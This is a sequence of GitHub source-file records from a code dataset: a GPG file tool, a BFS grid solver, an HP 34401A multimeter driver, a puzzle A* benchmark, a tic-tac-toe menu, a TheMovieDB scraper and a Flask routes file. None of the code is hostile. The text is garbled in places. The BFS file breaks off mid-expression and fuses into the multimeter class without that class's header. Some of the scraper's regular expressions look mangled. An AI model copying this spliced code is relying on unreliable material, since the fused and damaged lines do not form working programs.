is required if you are encrypting\")\n    # Assign args to variables\n    if ARGS.encrypt:\n        ARG_ACTION = \"encrypt\"\n    else:\n        ARG_ACTION = \"decrypt\"\n    ARG_PATH = ARGS.path\n    ARG_KEYS = ARGS.keyEmails\n    ARG_DELETE = ARGS.delete\n    main(ARG_ACTION, ARG_KEYS, ARG_DELETE, ARG_PATH)\n","repo_name":"ahrenstein/GPG-Bulk-File-Management","sub_path":"SourceCode/gpg_files_bulk_manage.py","file_name":"gpg_files_bulk_manage.py","file_ext":"py","file_size_in_byte":8720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} {"seq_id":"69947792109","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 24 14:39:40 2020\n\n@author: hihyun\n\"\"\"\n\ndef find(cur):\n    cx,cy=cur\n    c=[]\n    #up\n    if cx-1>=0:\n        if g[cx-1][cy]>g[cx][cy]:\n            c.append((cx-1,cy))\n    #down\n    if cx+1<num:\n        if g[cx+1][cy]>g[cx][cy]:\n            c.append((cx+1,cy))\n    #left\n    if cy-1>=0:\n        if g[cx][cy-1]>g[cx][cy]:\n            c.append((cx,cy-1))\n    #right\n    if cy+1<num:\n        if g[cx][cy+1]>g[cx][cy]:\n            c.append((cx,cy+1))\n    return c\n    \ndef bfs(cur):\n    if memo[str(cur)]!=-1:\n        return memo[str(cur)]\n    \n    else: \n        q=[cur]\n        c={str(cur):1}\n        pre={str(cur):None}\n        while len(q)!=0:\n            cp=q.pop(0)\n            if pre[str(cp)] is not None:\n                c[str(cp)]=c[str(pre[str(cp)])]+1\n            child=find(cp)\n            for i in child:\n                if memo[str(i)]!=-1:\n                    print('touch')\n                    c[str(i)]=c[str(cp)]+memo[str(i)]\n                else:\n                    q.append(i)\n                    pre[str(i)]=cp\n        memo[str(cur)]=max(list(c.values()))\n        return memo[str(cur)]\n\n\n#f = open(\"./input.txt\", 'r')\n#num=int(f.readline().strip())\nnum=int(input())\ng=[]\nmemo={}\nfor idxi,i in enumerate(range(num)):\n    #temp=list(map(int,f.readline().strip().split(' ')))\n    
temp=list(map(int,input().split(' ')))\n    g.append(temp)\n    for idxj,j in enumerate(temp):\n        memo[str((idxi,idxj))]=-1\nfor i in memo.keys():\n    print(i)\n    if all([-1 None:\n        super().__init__(address, **kwargs)\n        self.factor = kwargs.get('factor', 1.0)\n        self.nplc_default = 1  # power line cycles to average\n        self.line_frequency = kwargs.get('line_frequency', float(50))  # Hz\n        self.sample_count = self.get_sample_count()\n        self.measure_time = self.set_measure_time()\n        self.trigger_mode = self.get_trigger_source()\n\n    def __del__(self) -> None:\n        self.set_local()\n        super().__del__()\n\n    def set_mode(self, mode: str) -> None:\n        \"\"\"\n        set_mode(mode)\n\n        mode: str, type of measurement to be done\n        valid modes are: 'VDC', 'VAC', 'ADC', 'AAC', 'FREQ', 'OHMS',\n        'DIOD', 'CONT', 'PER'\n        which correspond to DC voltage, AC voltage, DC current, AC current,\n        frequency, resistance, diode voltage, continuity, and period\n        respectively (not case sensitive)\n\n        Configures the multimeter to perform the specified measurement\n        \"\"\"\n\n        mode = str(mode).upper()\n        if not (mode in self.valid_modes):\n            raise ValueError(\"Invalid mode option\")\n\n        self.write_resource(f\"CONF:{self.valid_modes[mode]}\")\n\n    def get_mode(self) -> str:\n        \"\"\"\n        get_mode()\n\n        retrieves the type of measurement the multimeter is currently\n        configured to perform.\n\n        returns: str\n        \"\"\"\n\n        response = self.query_resource(\"FUNC?\")\n        return response.replace('\"', '')\n\n    def get_error(self, **kwargs) -> str:\n        \"\"\"\n        get_error\n\n        Returns:\n            [list]: last error in the buffer\n        \"\"\"\n        response = self.query_resource('SYSTem:ERRor?', **kwargs)\n        return self.resp_format(response, str)\n
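\n    # Standalone sketch of the raw SCPI exchange that write_resource/\n    # query_resource wrap, using pyvisa directly (hypothetical VISA address;\n    # needs real hardware to actually run):\n    @staticmethod\n    def _pyvisa_sketch(address: str = 'GPIB0::22::INSTR') -> float:\n        import pyvisa  # assumed installed; this driver normally goes through its base class\n        dmm = pyvisa.ResourceManager().open_resource(address)\n        dmm.write('CONF:VOLT:DC')\n        return float(dmm.query('READ?'))\n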
\n    def set_trigger(self, trigger: str, **kwargs) -> None:\n        \"\"\"\n        set_trigger(trigger)\n\n        Configures the multimeter to trigger as specified\n        The TRIGger subsystem configures the triggering that controls\n        measurement acquisition.\n        Recommendation: All triggered measurements should be made using an\n        appropriate fixed manual range. That is, turn autorange off\n        ([SENSe:]<function>:RANGe:AUTO OFF) or set a fixed range using the\n        [SENSe:]<function>:RANGe, CONFigure, or MEASure command.\n\n        trigger: str, type of trigger to be done\n        valid modes are: 'BUS', 'IMMEDIATE', 'EXTERNAL'.\n        \"\"\"\n\n        valid_delay = {'MIN', 'MINIMUM', 'MAX', 'MAXIMUM'}\n        valid_count = {'MIN', 'MINIMUM', 'MAX', 'MAXIMUM', 'INF', 'INFINITE'}\n\n        if kwargs.get('delay', False):\n\n            if isinstance(kwargs['delay'], str):\n                delay = kwargs['delay'].upper()\n            else:\n                delay = kwargs['delay']\n\n            if not ((delay in valid_delay) or isinstance(delay, (int, float))):\n                raise ValueError(f\"Invalid trigger delay. Use: {valid_delay}\")\n\n            self.write_resource(f\"TRIG:DELay {delay}\")\n\n        if kwargs.get('count', False):\n\n            if isinstance(kwargs['count'], str):\n                count = kwargs['count'].upper()\n            else:\n                count = kwargs['count']\n\n            if not ((count in valid_count) or isinstance(count, int)):\n                # note: if count is not an int the 2nd condition wont execute\n                if not (isinstance(count, int) and (1 <= count <= 50000)):\n                    raise ValueError('Invalid trigger count.'\n                                     f' Use: {valid_count} or an int within'\n                                     ' the range [1, 50000]')\n\n            self.write_resource(f\"TRIG:COUNt {count}\")\n\n        trigger = trigger.upper()\n        if trigger not in self.valid_trigger:\n            raise ValueError(\"Invalid trigger option\")\n        self.write_resource(f\"TRIG:{self.valid_trigger[trigger]}\")\n\n    def set_trigger_source(self, trigger: str = 'IMMEDIATE', **kwargs) -> None:\n        \"\"\"\n        set_trigger_source(trigger)\n\n        Configures the multimeter to trigger as specified\n\n        trigger: str, type of trigger to be done\n        valid modes are: 'BUS', 'IMMEDIATE', 'EXTERNAL'.\n        \"\"\"\n\n        trigger = str(trigger).upper()\n        if trigger not in self.valid_trigger:\n            raise ValueError(\"Invalid trigger option\")\n\n        self.trigger_mode = self.valid_trigger[trigger]\n        self.write_resource(f\"TRIG:SOUR {self.trigger_mode}\", **kwargs)\n\n    def get_trigger_source(self, **kwargs) -> str:\n\n        response = self.query_resource(\"TRIG:SOUR?\", **kwargs)\n        fmt_resp = self.resp_format(response, str)\n\n        self.trigger_mode = self.valid_trigger[fmt_resp]\n        return self.trigger_mode\n\n    def set_trigger_count(self, count: int, **kwargs) -> None:\n        \"\"\"\n        set_trigger_count(count)\n\n        Args:\n            count (int): how many readings to take when triggered\n        \"\"\"\n        valid_count = {'MIN', 'MINIMUM', 'MAX', 'MAXIMUM', 'INF', 'INFINITE'}\n\n        count = count.upper() if isinstance(count, str) else count\n\n        if not ((count in valid_count) or isinstance(count, int)):\n            # note: if count is not an int the 2nd condition wont execute\n            if isinstance(count, int) and (1 <= count <= 50000):\n                pass\n            else:\n                raise ValueError('Invalid trigger count.'\n                                 f' Use: {valid_count} or an int within'\n                                 ' the range [1, 50000]')\n\n        self.write_resource(f\"TRIG:COUNt {count}\", **kwargs)\n\n    def get_trigger_count(self, **kwargs) -> int:\n        response = self.query_resource(\"TRIG:COUN?\", **kwargs)\n        return int(self.resp_format(response, float))\n\n    def measure_voltage(self):\n        \"\"\"\n        measure_voltage()\n\n        returns float, measurement in Volts DC\n\n        Measure the voltage present at the DC voltage measurement terminals.\n        If the meter is not configured to measure DC voltage this will raise an\n        exception. This can be remedied by setting the measurement mode with the\n        set_mode method.\n\n        \"\"\"\n        if self.get_mode() != 'VOLT':\n            raise IOError(\"Multimeter is not configured to measure voltage\")\n        response = self.query_resource(\"MEAS:VOLT:DC?\")\n        return self.factor*float(response)\n\n    def measure_voltage_rms(self):\n        \"\"\"\n        measure_voltage_rms()\n\n        returns float, measurement in Volts rms\n\n        Measure the voltage present at the AC voltage measurement terminals.\n        If the meter is not configured to measure AC voltage this will raise an\n        exception. 
This can be remedied by setting the measurement mode with the\n        set_mode method.\n\n        \"\"\"\n        if self.get_mode() != 'VOLT:AC':\n            raise IOError(\"Multimeter is not configured to measure AC voltage\")\n        response = self.query_resource(\"MEAS:VOLT:AC?\")\n        return self.factor*float(response)\n\n    def measure_current(self):\n        \"\"\"\n        measure_current()\n\n        returns float, measurement in Amperes DC\n\n        Measure the current present through the DC current measurement\n        terminals. If the meter is not configured to measure DC current this\n        will raise an exception. This can be remedied by setting the measurement\n        mode with the set_mode method.\n\n        \"\"\"\n        if self.get_mode() != 'CURR':\n            raise IOError(\"Multimeter is not configured to measure current\")\n        response = self.query_resource(\"MEAS:CURR:DC?\")\n        return self.factor*float(response)\n\n    def measure_current_rms(self):\n        \"\"\"\n        measure_current_rms()\n\n        returns float, measurement in Amperes rms\n\n        Measure the current present through the AC current measurement\n        terminals. If the meter is not configured to measure AC current this\n        will raise an exception. This can be remedied by setting the measurement\n        mode with the set_mode method.\n\n        \"\"\"\n        if self.get_mode() != 'CURR:AC':\n            raise IOError(\"Multimeter is not configured to measure AC current\")\n        response = self.query_resource(\"MEAS:CURR:AC?\")\n        return self.factor*float(response)\n\n    def measure_resistance(self):\n        \"\"\"\n        measure_resistance()\n\n        returns float, measurement in Ohms\n\n        Measure the resistance present at the resistance measurement terminals.\n        If the meter is not configured to measure resistance this will raise an\n        exception. This can be remedied by setting the measurement mode with the\n        set_mode method.\n\n        \"\"\"\n        if self.get_mode() != 'RES':\n            raise IOError(\"Multimeter is not configured to measure resistance\")\n        response = self.query_resource(\"MEAS:RES?\")\n        return float(response)\n\n    def measure_frequency(self):\n        \"\"\"\n        measure_frequency()\n\n        returns float, measurement in Hertz\n\n        Measure the frequency present at the frequency measurement terminals.\n        If the meter is not configured to measure frequency this will raise an\n        exception. This can be remedied by setting the measurement mode with the\n        set_mode method.\n\n        \"\"\"\n        if self.get_mode() != 'FREQ':\n            raise IOError(\"Multimeter is not configured to measure frequency\")\n        response = self.query_resource(\"MEAS:FREQ?\")\n        return float(response)\n\n    def init(self, **kwargs) -> None:\n        \"\"\"\n        init(**kwargs)\n\n        Initialize the meter, used with BUS trigger typically\n        Use fetch_data (FETCh) to get the data.\n        \"\"\"\n\n        self.write_resource('INITiate', **kwargs)\n\n    def fetch_data(self, **kwargs) -> float:\n        \"\"\"\n        fetch_data(**kwargs)\n\n        Returns:\n            [list, float]: data in meter memory resulting from all scans\n        \"\"\"\n        response = self.query_resource('FETC?', **kwargs)\n        return self.resp_format(response, float)\n\n    def abort(self, **kwargs) -> None:\n        \"\"\"\n        abort()\n\n        Send VISA ABORt, stop the scan!!\n        \"\"\"\n        self.write_resource('ABORt', **kwargs)\n
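\n    # Quick check of the NPLC timing model that trigger() and\n    # set_measure_time() below rely on: sample_count * nplc cycles at the\n    # line frequency, plus a 10 ms pad (numbers here are illustrative):\n    @staticmethod\n    def _measure_time_sketch(samples: int, nplc: float, line_freq: float) -> float:\n        # e.g. 10 samples at 1 NPLC on 50 Hz -> 10 * 1 / 50 + 0.01 = 0.21 s\n        return samples * nplc * (1 / line_freq) + 0.01\n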
\n    def trigger(self, wait: bool = True, **kwargs) -> None:\n        \"\"\"\n        trigger(wait=True)\n\n        If the unit is set up to BUS trigger, sends the trigger;\n        if it is not set up to BUS trigger, it logs an error instead\n\n        Args:\n            wait (bool, optional): Does not return to caller until scantime\n                                   is complete. Prevents Trigger Ignored\n                                   errors (-211). Defaults to True.\n        Returns:\n            None\n        \"\"\"\n\n        if self.trigger_mode == self.valid_trigger['BUS']:\n            self.write_resource('*TRG', **kwargs)\n        else:\n            print(f\"Trigger not configured, set as: {self.trigger_mode}\"\n                  f\" should be {self.valid_trigger['BUS']}\")\n\n        if wait:\n            sleep(self.measure_time)  # should work most of the time.\n            # it should also wait nplc time per channel\n            # need to make a function to track nplc time\n            # if nplc is longer than 1, then this will fail, if shorter\n            # then this will take way too long\n\n    def set_sample_count(self, count: int, **kwargs) -> None:\n        self.write_resource(f\"SAMP:COUN {count}\", **kwargs)\n\n    def get_sample_count(self, **kwargs) -> int:\n        response = self.query_resource(\"SAMP:COUN?\", **kwargs)\n        self.sample_count = int(self.resp_format(response, float))\n        return self.sample_count\n\n    def config(self, mode: str = 'volt', acdc: str = 'dc',\n               signal_range: str = 'auto', resolution=None,\n               nplc=0.02, **kwargs) -> None:\n        \"\"\"config(...)\n\n        Args:\n            mode (str, optional): meter mode. Defaults to 'volt'.\n            acdc (str, optional): ac or dc measurement setting.\n                                  Defaults to 'dc'.\n            signal_range (str, optional): measurement range. Defaults to 'auto'\n            resolution (str, optional): 4.5, 5.5 or 6.5, if None uses nplc\n                                        nplc is recommended because script\n                                        timing is more deterministic.\n                                        Defaults to None.\n            nplc (float, optional): power line cycles to average.\n                                    Defaults to 0.02.\n        Kwargs:\n            verbose (bool, optional): Whether or not the command message sent\n                to the device is also printed to stdio.out, for debugging\n                purposes. Defaults to False.\n        \"\"\"\n\n        valid_acdc = {'DC': ':DC',\n                      'AC': ':AC'}\n\n        mode = mode.upper()\n        if mode not in self.valid_modes:\n            raise ValueError(\"Invalid mode option\")\n        mode = self.valid_modes[mode]\n\n        usefreq = (mode == self.valid_modes['FREQ'])\n        usecurrent = (mode == self.valid_modes['CURR'])\n        useres = (mode == self.valid_modes['RES'])\n\n        acdc = acdc.upper()\n        if acdc not in valid_acdc:\n            raise ValueError(\"Invalid acdc option\")\n        acdc = valid_acdc[acdc] if not usefreq else ''\n\n        # if range is not provided, cannot use nplc in CONF command\n        signal_range = signal_range.upper()\n        if signal_range == 'AUTO':\n            signal_range = False\n\n        try:\n            if usecurrent and signal_range not in self.valid_cranges:\n                raise ValueError('Invalid Current Range option')\n            elif useres and signal_range not in self.valid_Rranges:\n                raise ValueError('Invalid Resistance Range option')\n            elif signal_range not in self.valid_ranges:\n                raise ValueError('Invalid Range option')\n\n        except ValueError:\n            if kwargs.get('verbose', False):\n                print(\"signal_range not in list, using max\")\n            signal_range = 'MAX'  # same as MAX for current\n\n        nplc = str(nplc).upper()\n        if not (nplc in self.nplc):\n            raise ValueError(\"Invalid nplc option\")\n        nplc = nplc if not usefreq else ''\n\n        cmds = []\n        if resolution and signal_range:\n            cmds.append(f\"CONF:{mode}{acdc} {signal_range},{resolution}\")\n        else:\n            if signal_range:\n                cmds.append(f\"CONF:{mode}{acdc} {signal_range}\")\n            else:\n                cmds.append(f\"CONF:{mode}{acdc}\")\n\n        if (resolution or nplc) and (not usefreq):\n            cmds.append(f\"SENS:{mode}{acdc}\"\n                        f\"{':RES ' if resolution else ':NPLC '}\"\n                        f\"{resolution if resolution else nplc}\")\n\n        for cmd_str in cmds:\n            if kwargs.get('verbose', False):\n                print(cmd_str)\n            self.write_resource(cmd_str, **kwargs)\n\n    def resp_format(self, response: str,\n                    resp_type: type = int) -> Union[Any, List[Any]]:\n        \"\"\"\n        resp_format(response(str data), type(int/float/etc))\n\n        
Args:\n response (str): string of data to parse\n type (type, optional): what type to output. Defaults to int.\n\n Returns:\n list[type], or type: return is a list if more than 1 element\n otherwise returns the single element as type\n \"\"\"\n if '@' in response:\n start = response.find('@') # note this returns -1 if not found\n stop = -1\n else:\n start = -1\n stop = None\n # that works out OK because data needs to be parsed from the first\n # character anyway, so this is not an error, but I don't like\n # that it isn't explicitly trying to find the correct character\n response = list(map(resp_type, response[start+1:stop].split(',')))\n\n if len(response) == 1:\n return response[0]\n return response\n\n def set_measure_time(self, measure_time: float = None):\n if measure_time is None:\n self.measure_time = (self.sample_count * self.nplc_default *\n (1 / self.line_frequency) + 0.01)\n else:\n self.measure_time = measure_time\n return self.measure_time\n\n def set_local(self, **kwargs) -> None:\n self.write_resource(\"SYSTem:LOCal\", **kwargs)\n","repo_name":"AnnaGiasson/PythonEquipmentDrivers","sub_path":"pythonequipmentdrivers/multimeter/HP_34401A.py","file_name":"HP_34401A.py","file_ext":"py","file_size_in_byte":19173,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"21539645892","text":"from .Function import *\n\nclass Plus(Function):\n def __init__(self, name, info):\n Function.__init__(self, name, info)\n self.js = compiler.compile(readFile(\"export/templates/js/plus.js\"))\n\n def generate(self):\n data = {\n \"name\": self.name,\n \"left\": \"components.\" + self.params[\"left\"],\n \"right\": \"components.\" + self.params[\"right\"]\n }\n\n return {\n \"name\": \"method_\" + self.name,\n \"js\": self.js(data)\n }, self.triggers, [\"result\"]\n","repo_name":"ThierryDeruyttere/Appy-Server","sub_path":"export/exporter/functions/Plus.py","file_name":"Plus.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24962318656","text":"import time\nimport pandas as pd\nimport numpy as np\nfrom Game import Solver, Game\n\ngoal = Game()\ngoal.set_board([[1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n [13, 14, 15, 0],\n ])\n\nstart_positions = np.load(\"positions.npy\")\nstart_boards = []\nfor pos in start_positions:\n board = Game()\n board.set_board(pos.tolist())\n start_boards.append(board)\nstart_positions = start_boards\n\ntimes = []\naverageHeuristic = []\nclosedDfs = []\nclosedAStar = []\nlengths = []\n\n\nfor start in start_positions:\n solver = Solver()\n startTime = time.time()\n foundPath = list(solver.astar(start, goal))\n manhattanTime = time.time() - startTime\n print(manhattanTime)\n print(len(foundPath))\n times.append(manhattanTime)\n averageHeuristic.append(solver.get_average())\n closedDfs.append(solver.dfsVisted)\n closedAStar.append(solver.closedSize)\n lengths.append(len(foundPath))\n\ndata = {'Time': times, 'Average Heuristic': averageHeuristic,\n 'Expanded DFS': closedDfs, 'Expanded A*': closedAStar, 'Length': lengths}\n\ndf = pd.DataFrame(data)\ndf.to_csv(\"Regular.csv\")\n","repo_name":"YardenRokach/Lookahead-Closed-A-Star","sub_path":"RegularAStar.py","file_name":"RegularAStar.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16291617357","text":"from Tabuleiro.tabuleiro import Tabuleiro\nfrom 
Tabuleiro.jogador import Jogador\n\ndef MenuOpcoes() -> None:\n    '''\n    Prints the game's options menu on the screen\n    :return: None\n    '''\n    print(\"\\t\\tJOGO DA VELHA\\n\")\n    print(\"1 - Jogar contra outro Player\")\n    print(\"2 - Jogar contra CPU\")\n    print(\"3 - Personalizar jogo\")\n    print(\"4 - Jogar CPU contra CPU\")\n    print(\"5 - Sair\")\n\ndef JogarNovamente(tabuleiro: Tabuleiro, jogador1: Jogador, jogador2: Jogador)->int:\n    '''\n    Returns 1 if the player wants to play again, 2 if not.\n    :return: Number int\n    '''\n    usuario = int(input(\"Deseja jogar novamente?\\n1 - Sim\\n2 - Não\\nVocê: \"))\n    jogador1.ResetarMovimentos()\n    jogador2.ResetarMovimentos()\n    tabuleiro.ResetarCasas()\n    return usuario","repo_name":"Elielson68/JogoDaVelha","sub_path":"Jogo/JogoController.py","file_name":"JogoController.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} {"seq_id":"73051526187","text":"#!/usr/bin/python3\n\nfrom urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport sqlite3\nimport time\nimport random\nimport logging\nimport copy\n\nimport threading\nimport concurrent.futures\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n#import thread\n\ndatabase = \"database/test.db\"\nlinkFile = \"data/links.csv\"\n\ndatabaseConnection = sqlite3.connect(database)\ndbSql = databaseConnection.cursor()\n\nbaseLinkImage = 'https://www.themoviedb.org'\n\n# multithread implementation to drastically improve speed\n# each position contains a dictionary with:\n# {cl: [], overview: overview, imageLink: imageLink, actor: []}\ncollectedData = []\nnotCollected = []\n\ndef CollectDataFor(cl):\n    logger.info(\"Start collecting data for:\" + cl)\n    cl = cl.split(',')\n    linkToInfo = baseLinkImage + '/movie/' + str(cl[2])\n\n    counter = 0\n    triedSleep = 1\n    while counter < 10:\n        req = None\n        webpage = None\n        try:\n            req = Request(linkToInfo, headers={'User-Agent': 'Mozilla/5.0'})\n            webpage = urlopen(req).read()\n        except Exception as e:\n            logger.error(\"HTTP ERROR OCCURRED: \" + str(e))\n            errorCode = re.findall('\\d+', str(e))\n            if len(errorCode) > 0 and int(errorCode[0]) == 429:\n                if triedSleep > 2:\n                    logger.critical(\"CANT MAKE ANY MORE REQUESTS, EXITING\")\n                    databaseConnection.close()\n                    exit(0)\n                triedSleep += 1\n                logger.info(\"Too many requests, trying to sleep for a while\")\n                time.sleep(10*triedSleep)\n            else:\n                counter = 10\n        else:\n            webSoup = BeautifulSoup(webpage, \"html.parser\")\n\n            overview = webSoup.find_all(\"div\", {\"class\": \"overview\"})\n            if len(overview) > 0:\n                overview = re.findall(r'
<p>(.*?)</p>
', str(overview))[0]\n else:\n logger.warning(\"CANT FIND DATA FOR: \" + str(cl))\n return\n\n imageLink = webSoup.find_all(\"img\", {\"class\": \"poster\"})\n if len(imageLink) > 0:\n imageLink = baseLinkImage + str(re.findall(r'src=\"(.*?)\"', str(imageLink))[0])\n else:\n imageLink = None\n\n actor = webSoup.find_all(\"ol\", {\"class\": \"people\"})\n actor = re.findall(r'
<li>.*(.*?).*</li>
', str(actor))\n\n            if len(overview) > 10:\n                logger.info(\"Found info for \" + str(cl[0]))\n                infoDict = {}\n                infoDict[\"cl\"] = cl\n                infoDict[\"overview\"] = overview\n                infoDict[\"imageLink\"] = imageLink\n                infoDict[\"actor\"] = actor\n                collectedData.append(infoDict)\n                break\n            else:\n                logger.info(\"Not found. Repeating id:\" + str(cl[0]) + ' - c:' + str(counter))\n                counter += 1\n                time.sleep(random.random()*2)\n    if counter == 10:\n        logger.warning(\"CANT FIND DATA FOR: \" + str(linkToInfo))\n\n\ndef InsertIntoDatabase():\n    while collectedData:\n        cData = collectedData.pop(0)\n        logger.debug(str(cData))\n        for tc in cData[\"actor\"]:\n            if len(tc) > 1:\n                tcId = dbSql.execute(\"SELECT id FROM actor WHERE name=?\", (tc,)).fetchall()\n                if len(tcId) == 0:\n                    dbSql.execute(\"INSERT INTO actor(name) VALUES(?)\", (tc,))\n                    tcId = dbSql.execute(\"SELECT id FROM actor WHERE name=?\", (tc,)).fetchall()\n                dbSql.execute(\"INSERT INTO movieActor(id_movie, id_actor) VALUES(?,?)\", (int(cData[\"cl\"][0]), int(tcId[0][0]),))\n\n        dbSql.execute(\"UPDATE movie SET overview=?, image=? WHERE id=?\", (cData[\"overview\"], cData[\"imageLink\"], int(cData[\"cl\"][0]),))\n        cMovie = dbSql.execute(\"SELECT title, overview FROM movie WHERE id=?\", (int(cData[\"cl\"][0]),)).fetchall()\n        logger.info(\"Inserted additional data for movie: \" + str(cMovie[0][0]))\n\ndef alreadyInDatabase(cl):\n    cl = cl.split(',')\n    overview = dbSql.execute(\"SELECT overview FROM movie WHERE id=?\", (cl[0],)).fetchall()\n    logger.debug(str(overview))\n    if overview[0][0] is not None and len(overview[0][0]) > 25:\n        return True\n    return False\n\nmaxThreads = 5\nchunkCounter = 0\nmoviesLeft = 0\n\nwith open(linkFile, newline='') as cLink:\n    moviedbId = re.sub(r'[^\\x00-\\x7f]',r' ', cLink.read())\n    moviedbId = moviedbId.splitlines()\n    moviedbId.pop(0)\n    moviesLeft = len(moviedbId)\n\n    chunks = [moviedbId[x:x+maxThreads] for x in range(0, len(moviedbId), maxThreads)]\n\n    try:\n        for chunk in chunks:\n            #logger.debug(\"chunk data:\"+str(chunk))\n            i = 0\n            while i < len(chunk):\n                if alreadyInDatabase(chunk[i]):\n                    del chunk[i]\n                    moviesLeft -= 1\n                else:\n                    i += 1\n            if len(chunk) > 0:\n                logger.debug(\"Still no data:\"+str(chunk))\n                if len(chunk) > 1:\n                    with concurrent.futures.ThreadPoolExecutor(max_workers=maxThreads) as executor:\n                        executor.map(CollectDataFor, chunk)\n                else:\n                    CollectDataFor(chunk[0])\n                InsertIntoDatabase()\n            chunkCounter += len(chunk)\n            print(\"Movies left:\", moviesLeft - chunkCounter)\n    except Exception as e:\n        logger.error(\"ERROR IN MAIN FUNCTION: \" + str(e))\n\n#closing connection\nlogger.info(\"Committed current changes to database\")\ndatabaseConnection.commit()\ndatabaseConnection.close()\n","repo_name":"itsmartagonzalez/Hunediam-Prime","sub_path":"initialSetup/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
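# Aside on the retry loop in CollectDataFor above: a common alternative to a\n# fixed sleep per attempt is exponential backoff (a standalone sketch):\ndef backoff_delays_sketch(base=1.0, retries=5):\n    return [base * (2 ** i) for i in range(retries)]\nassert backoff_delays_sketch(1.0, 3) == [1.0, 2.0, 4.0]\n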
{"seq_id":"26536334404","text":"import os\n\nimport collections\n\nfrom flask import render_template, flash, redirect, request\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField, SelectField, SelectMultipleField, IntegerField\nfrom wtforms.validators import DataRequired\n\nimport urllib.request\nfrom bs4 import BeautifulSoup  # used by DataFromURL in the comparer route below\n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport re\nimport spacy\nimport nltk\n#nltk.download('stopwords')\n#nltk.download('wordnet')\n#nltk.download('punkt')\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import sent_tokenize\n\nimport textblob\nfrom textblob import TextBlob\n\nfrom app import app\nfrom app.DataBaseManager import DataBaseManager\nfrom app.reader_input_helpers import get_input_text\nfrom app.TextCleaner import *\nfrom app.TextCleaner import word_counts_text_cleaner, entity_recognition_text_cleaner, sentiment_text_cleaner, handy_cleaner, kw_cleaner\nfrom app.TextToFrame import TextToFrame\nfrom app.TextFeatureEngineering import TextFeatureEngineering\nfrom app.text_statistics_helpers import text_values_counts_dict, select_n_most_occuring_phrases, text_sentiment, get_sentences_with_keyword, phrases_sentiment_in_respect_to_full_text\nfrom app.reader_output_text_helpers import sentences_to_spanned_html, sentences_to_html\nfrom app.PlottingTextData import plot_word_counts, plot_words_sent\nfrom app.forms.reader_form import ReaderForm\nfrom app.forms.keywords_form import AddKeywordsForm, RmvKeywordsForm, RmvSetForm\nfrom app.forms.comparer_form import CompareForm\n\n\n\n\n# Main routes file. Contains all sub-pages code and their imports:\n# 1. Index\n# 2. Keywords\n# 3. Reader\n# 4. Form [comparer page]\n# 5. (...) tbd.\n\n\n\n# 1. INDEX\n# --------\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\treturn render_template('index.html', title='Home')\n\n\n# 2. KEYWORDS\n# -----------\n\n@app.route('/keywords', methods=['GET', 'POST'])\ndef keywords_main_page():\n\n\t# Clean, unify later\n\tcredentials = { 'dbname': 'reader_keywords', 'dbuser': 'luke'} # TEMP: into a file.\n\tkeywords_table_name = 'keywords_test'\n\tkeywords_columns_types = \t[\n\t\t\t\t\t\t\t\t\t#('id serial', 'PRIMARY KEY'),\n\t\t\t\t\t\t\t\t\t('set_name', 'text'),\n\t\t\t\t\t\t\t\t\t('keyword', 'text'),\n\t\t\t\t\t\t\t\t\t# ...\n\t\t\t\t\t\t\t\t]\n\tDBM = DataBaseManager(credentials, keywords_table_name, keywords_columns_types)\n\n\n\tadd_kwds_form = AddKeywordsForm()\n\tif add_kwds_form.validate_on_submit():\n\t\t\n\t\tkeywords = add_kwds_form.add_kwds.data\n\t\tset_name = add_kwds_form.add_kwds_set_name.data\n\t\t\n\t\tDBM.add_keywords(set_name, keywords)\n\n\t\tx = 'add'\n\t\tprint(x)\n\n\trmv_kwds_form = RmvKeywordsForm()\n\tif rmv_kwds_form.validate_on_submit():\n\t\t\n\t\tkeywords = rmv_kwds_form.rmv_keywords.data\n\t\tset_name = rmv_kwds_form.rmv_kwds_set_name.data\n\n\t\tDBM.rmv_keywords(set_name, keywords)\n\n\t\tx = 'rm kw'\n\t\tprint(x)\n\n\trmv_set_form = RmvSetForm()\n\tif rmv_set_form.validate_on_submit():\n\n\t\tset_name = rmv_set_form.rmv_set_name.data\n\n\t\tDBM.rmv_kwd_set(set_name)\n\n\t\tx = 'rm set'\n\t\tprint(x)\n\n\t# ADD DISPLAY CURRENT KWS\n\tDBM.get_names_of_sets()\n\n\treturn render_template('keywords.html', title='Keywords',add_kwds_form=add_kwds_form, rmv_kwds_form=rmv_kwds_form, rmv_set_form=rmv_set_form, )\n\n\n\n# 3. 
